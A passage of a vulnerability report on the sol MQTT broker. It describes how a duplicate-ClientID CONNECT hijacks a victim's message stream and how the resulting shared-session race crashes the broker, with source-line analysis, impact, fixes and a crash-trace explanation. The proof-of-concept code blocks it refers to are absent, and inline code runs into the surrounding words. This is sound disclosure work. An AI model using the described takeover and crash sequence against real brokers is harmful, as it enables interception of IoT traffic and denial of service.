server.sessionsis the session store; the live connections live inserver.clients_map. There is noHASH_FIND_STRonserver.clients_mapanywhere inconnect_handler— the only such lookup in the file is inpublish_message(handlers.c:167). There is noclient_deactivate()call and no DISCONNECT send on the colliding path. Theclient_deactivate()call sites are exclusively on a client's own read-error/disconnect teardown (server.c:709/833/884), and the onlyHASH_DEL(server.clients_map, ...)lives insideclient_deactivate(server.c:441), never on connect. So the pre-existing connection stays authenticated and online (itsonlineflag, set atclient_init/accept inserver.c:383, is cleared only in its ownclient_deactivateatserver.c:425).The session-HASH_DEL at line 403 and the
session_present=1at line 405 touch only the session table, never the live socket.2. Duplicate ClientID keys coexist in
clients_map.This call is guarded only by the global
mutex(taken athandlers.c:397), not by any duplicate-key check. sol's bundled uthash does not deduplicate:HASH_ADD_TO_BKT(src/uthash.h:869-884) merely prependsaddhhto the bucket'shh_headlist with no key-equality check, andHASH_ADD_TO_TABLE(uthash.h:376-385) likewise enforces no uniqueness. Twostruct cliententries with identicalclient_idtherefore coexist.3. The colliding CONNECT reuses the victim's session by pointer.
On the
clean_session=falsecollision path, the session-reuse branch is taken and allocation is skipped:Since
cc->sessionwas already populated by theHASH_FIND_STRat line 400, the new client'scc->sessionends up pointing to the samestruct client_sessionthe already-connected victim is using. Three references to one struct now coexist: theserver.sessionsuthash entry, the victim'sc->session, and the attacker'scc->session. No deep copy occurs.session_present=1(handlers.c:405) is later passed toset_connack(handlers.c:471) as the CONNACK Session-Present flag (set_connackwrites0 | (sp & 0x1) << 0,handlers.c:311) — observed asSP=1in the PoC.4. Routing uses first-match bucket lookup → newest connection wins.
HASH_FIND_STR→HASH_FIND→HASH_FIND_BYHASHVALUE→HASH_FIND_IN_BKT(src/uthash.h:846-866) walks the bucket chain fromhh_headand breaks on the first key match (uthash.h:853-857). BecauseHASH_ADD_TO_BKTprepends (uthash.h:873-878),hh_headis the most-recently-added entry. Both connections hash to the same bucket (identical key string), so the lookup returns the attacker (B, added second). This is why subsequent PUBLISHes for that ClientID are delivered to the attacker and not to the victim.(Clarifying "head": here "head" means the bucket's
hh_head, set by prepend = most-recently-added — not the global uthash list head, whichHASH_APPEND_LISTappends to. The publish-routing path uses the bucket chain, so "most-recently-added" is the right description.)5. No session-level lock; the shared session is mutated concurrently.
struct client_session(sol_internal.h:225-244) has nopthread_mutex_tmember — onlyUT_hash_handle hhandstruct ref refcount. The per-client lock lives onstruct client(sol_internal.h:208), not the session. The ack handlers that DECREF inflight packets lock only the calling client's mutex:pubcomp_handler(handlers.c:839-855, DECREF at line 848) follows the same single-c->mutexpattern. Becausec1->session == c2->sessionbutc1->mutex != c2->mutex, two threads can mutate the samei_msgs[]/i_acks[]/inflights/next_free_midwith no lock in common.Precision on locking asymmetry (important): the publish side of these mutations is guarded —
publish_messagetakes the globalmutex(handlers.c:152), which coversnext_free_mid()(line 189) and the inflight writes (lines 202-204 offline / 216-218 online). The ack side (puback/pubcomp) takes onlyc->mutex, not the globalmutex. (Note:pubrec_handlerathandlers.c:803-820does takec->mutexat line 809, but its only shared-session write —c->session->i_acks[pkt_id] = time(NULL)at line 817 — sits outside that lock; it does not mutatei_msgs[]and does not DECREF, so it is the weakest example of the pattern.) The hazard is the missing lock shared betweenc1->mutexandc2->mutex, combined with the ack side bypassing the global lock that protects the publish side. That asymmetry, plus the absence of any session-level lock, is the real root cause.6. The inflight-retry cron is the path that hits both colliding connections.
The cron is registered to fire every 1 second:
Critically,
inflight_msg_checkiterates clients withHASH_ITER(server.c:319), which visits every entry — including both colliding entries with the duplicate ClientID. The publish-routing path, by contrast, usesHASH_FIND_STR(first-match only) and thus funnels traffic to a single connection. This routing-vs-cron iteration difference is precisely why the 20 s-retry cron path — and only it — concurrently replays the sharedi_msgs[], creating the double-ref_dec/ NULL-packet window that crashes the broker. This also explains why naive high-throughput stress (routing-funnelled) does not crash, while the deliberate unacked-inflight + takeover sequence does.Specification context
sol is an MQTT 3.1.1 broker. The binding obligation it violates is the OASIS MQTT 3.1.1 requirement, numbered [MQTT-3.1.4-2] in the 3.1.1 spec (note: in the 3.1.1 numbering scheme — the collision rule's ID differs in v5.0; see the correction below):
sol does not comply: on a duplicate ClientID it neither sends a DISCONNECT to nor closes the pre-existing live connection.
For informational context, MQTT v5.0 strengthens the same obligation (and assigns it a different normative ID, [MQTT-3.1.4-3], not [MQTT-3.1.4-2]). From the v5.0 spec text:
Numbering correction (please cite carefully): the two specs use different IDs for the collision rule. In MQTT 3.1.1 it is [MQTT-3.1.4-2]; in MQTT v5.0 the collision/takeover rule is [MQTT-3.1.4-3] — v5.0's [MQTT-3.1.4-2] is a different statement about authentication/authorization checks (
MQTT-v5.0.txt:4749/ 12308-12314). Because sol is a 3.1.1 broker, the binding requirement it fails is the 3.1.1 [MQTT-3.1.4-2] "MUST disconnect the existing Client". The v5.0 [MQTT-3.1.4-3] 0x8E-DISCONNECT requirement is informational context showing how the obligation is strengthened in the newer spec; it is not a normative bar that a 3.1.1-only implementation is held to (sol already fails the lower 3.1.1 bar by leaving the old connection live).Impact
Confidentiality (High). The victim's entire subsequent subscribed-topic message stream is silently diverted to the attacker. The PoC shows that after the attacker's collision CONNECT, the victim receives nothing (
CLAIM3: A msgs=[]) while the attacker receives every PUBLISH (CLAIM2: B msgs=[b'hijacked-2']). For IoT deployments where ClientIDs are frequently fixed/guessable device identifiers, this is a full-stream disclosure.Integrity (High). The attacker becomes a silent MITM on the victim's stream — able to swallow, forge, or replay commands destined for IoT devices. Separately, the shared-session race corrupts the victim's
next_free_mid/i_msgs[]/i_acks[]/inflightsstate, so even non-intercepted traffic is at risk of misdelivery or silent loss.Availability (High). The concurrent double-clear of a shared inflight slot drives
ref_decon aNULLpacket pointer (SEGV on unknown address 0x80 (WRITE, zero page)inref_decatref.h:52, reached viapuback_handlerathandlers.c:793). This is a structural null/UAF dereference that will SIGSEGV a release build as well — it is not an ASan-only artifact; ASan merely makes reproduction reliable. Because sol is a single process with no SIGSEGV handler, the crash takes the broker down for every connected client.Stealth. Because sol never sends a DISCONNECT (let alone a v5.0 0x8E "Session taken over") to the displaced client, the victim's connection shows no sign of having been taken over — its keepalive PINGREQ/PINGRESP still round-trips (PoC
CLAIM1). Detection by the victim requires correlating a silent drop in message delivery with a takeover event, which is impractical in normal telemetry.Exploitability framing. The hijack is low-complexity and reliable at normal connection counts. The crash is timing-gated but the window is fully attacker-controlled (the attacker chooses PUBACK cadence and the takeover instant), so it does not rise to AC:H; note that bare high-throughput stress (~1.1M messages) does not crash because routing funnels traffic to a single connection and starves the concurrent-ack condition — the reliable trigger is the deliberate unacked-inflight + takeover sequence shown in the crash PoC.
Proof of Concept
All PoCs are bare MQTT 3.1.1 over plain TCP; no third-party Python dependencies. They target
127.0.0.1:1884againstsol_bin(hijack) orsol_asan(crash). Files live in-tree atpoc/.Build & run
PoC 1 — silent subscription/message hijack (
mqtt004_hijack.py)Minimal reproducer (self-contained; verbatim from the verified file):
Observed output (two independent clean runs, identical):
PoC 2 — remote crash via shared-session refcount race (
mqtt004_cron_race.py)Scenario: A (
clean=false) subscribes at QoS1; the publisher P sends 39 QoS1 PUBLISHes that A does not ack (they stay inflight in the shared session'si_msgs); wait 22 s so sol's 20 s inflight-retry cron (server.c:329-330) is armed; then attacker B connects with the same ClientID (session reuse). The cron'sHASH_ITERnow visits both A and B (duplicate keys) and concurrently operates on the samei_msgs[]/refcounts across the two worker threads (THREADSNR=2). B's PUBACK of a dup retry racing with A's cron retry on the same slot drivesref_decon aNULLpacket pointer → SEGV.Minimal harness (verbatim from the verified file; it imports codec helpers from
mqtt004_race.py):Suggested remediation
These are suggestions, not demands. The minimal, spec-aligned fix is the first item; the rest harden the shared-session invariant.
Disconnect the existing client on ClientID collision (binding 3.1.1 [MQTT-3.1.4-2]). In
connect_handler, beforeHASH_ADD_STR(server.clients_map, client_id, cc)athandlers.c:425, perform aHASH_FIND_STR(server.clients_map, cc->client_id, existing); if found andexisting != cc, send it a DISCONNECT (MQTT v5.0: Reason Code 0x8E "Session taken over", per [MQTT-3.1.4-3]; MQTT 3.1.1: a bare DISCONNECT) and tear it down via the existingclient_deactivate()path before adding the new client. This makes the long-standing "kick him out" comment athandlers.c:390-393finally true and removes the duplicate-key ambiguity entirely.Do not let two live connections share one
struct client_sessionwithout synchronisation. Either (a) disallow session reuse while a connection for that ClientID is still online (fail the second CONNECT or take it over atomically as above), or (b) givestruct client_sessionits ownpthread_mutex_tand require it for every mutation ofi_msgs[]/i_acks[]/inflights/next_free_mid, including the publish path, the ack handlers (puback/pubrec/pubcomp), and theinflight_msg_checkcron. Today the publish side holds only the globalmutexwhile the ack side holds onlyc->mutex— there is no lock shared between the two colliding clients, which is the precise root cause of the crash.Close the locking asymmetry explicitly. If a session-level lock is added, ensure the inflight-retry cron (
server.c:308-352, whichHASH_ITERs and so touches both colliding entries) and the ack handlers take it; today the cron's per-clientc->mutexlock (server.c:324) does not serialise access to the shared session because the two colliding clients hold differentc->mutexinstances. Also movepubrec_handler'sc->session->i_acks[pkt_id] = time(NULL)(handlers.c:817) inside itsc->mutexcritical section, or under the new session lock, so it stops being a data race.Consider replacing the unguarded
HASH_ADD_STRsemantics. Even after fix 1, an explicit "already-present" check before insertion is safer than relying on uthash's duplicate-key tolerance; it makes the routing table's single-winner invariant a code-level guarantee rather than a uthash-implementation detail (and pre-empts any future expansion-induced ordering surprise, whereHASH_EXPAND_BUCKETScan reverse intra-bucket order and flip the winner).References
RFC/MQTT-v5.0.txt, lines 4760-4765 and 12316-12324; reason-code definition at line 9211.)src/:handlers.c:390-393— dead "kick out" comment.handlers.c:400-405— session lookup / HASH_DEL / session_present.handlers.c:416— session-reuse branch (skips allocation).handlers.c:425— unconditional duplicate-keyHASH_ADD_STR.handlers.c:167—HASH_FIND_STRfirst-match routing inpublish_message.handlers.c:152, 189, 202-204, 216-218— publish side guarded by globalmutex.handlers.c:791-794, 803-820, 839-855— ack handlers locking onlyc->mutexwhile mutating the shared session (notepubrec'si_ackswrite at 817 sits outside its lock).handlers.c:309-311—set_connackwrites Session-Present at bit 0.sol_internal.h:225-244—struct client_sessionwith no mutex;sol_internal.h:208—struct clientcarries the mutex.server.c:308-352, 937— inflight-retry cron, 20 s threshold, 1 s cadence,HASH_ITERoverclients_map.server.c:319, 324— cronHASH_ITER+ per-clientc->mutex.server.c:381-404—client_init(setsonline=trueat 383, initsc->mutexat 403).server.c:412-446—client_deactivate(clearsonlineat 425,HASH_DEL(clients_map)at 441).server.h:39—THREADSNR = 2default.ref.h:50-52—ref_dec(the crash site).uthash.h:846-866(HASH_FIND_IN_BKT, first match),869-884(HASH_ADD_TO_BKT, prepend),951-973(HASH_EXPAND_BUCKETS, order reversal).sol.c:62,README.md:8— MQTT 3.1.1 self-identification;CMakeLists.txt:4—VERSION 0.18.5.config.c:368, 246-251—allow_anonymous=truedefault.PLVerifier/buchi_verify_workspace/sol/MQTT_004/poc/{mqtt004_hijack.py, mqtt004_cron_race.py, mqtt004_race.py, poc_report.md}.Appendix A — ASan/UBSan stack trace (verbatim)
Reproduced by running
sol_asan(-DDEBUG=ON, ASan+UBSan) on127.0.0.1:1884and executingmqtt004_cron_race.py. UBSan fires first, then ASan:Root-cause characterisation of the
0x80address: the accessed pointer isNULL(ani_msgs[pkt_id]slot that was cleared by a priorpuback_handlerrun athandlers.c:794,c->session->i_msgs[pkt_id].packet = NULL), and a concurrent/duplicate puback re-entersinflight_msg_clearand callsref_decon that NULL packet. In the debug build,&((struct mqtt_packet *)0)->refcount == 0x78;struct ref { void (*free)(...); volatile atomic_int count; }, socountlives at0x78 + 8 == 0x80.ref_decline 52 decrementscount, i.e. writespacket + 0x80; withpacket == NULLthat write lands at address0x80in the zero page → SEGV. The precise classification is therefore a concurrent double-clear of a shared inflight slot that DECREFs a NULL packet pointer, leading to a near-null-page write; "use-after-free" is acceptable shorthand, but the exact root cause is the unprotected shared-session NULL slot, which is why ASan reports a SEGV/DEADLYSIGNAL rather than a heap-use-after-free report.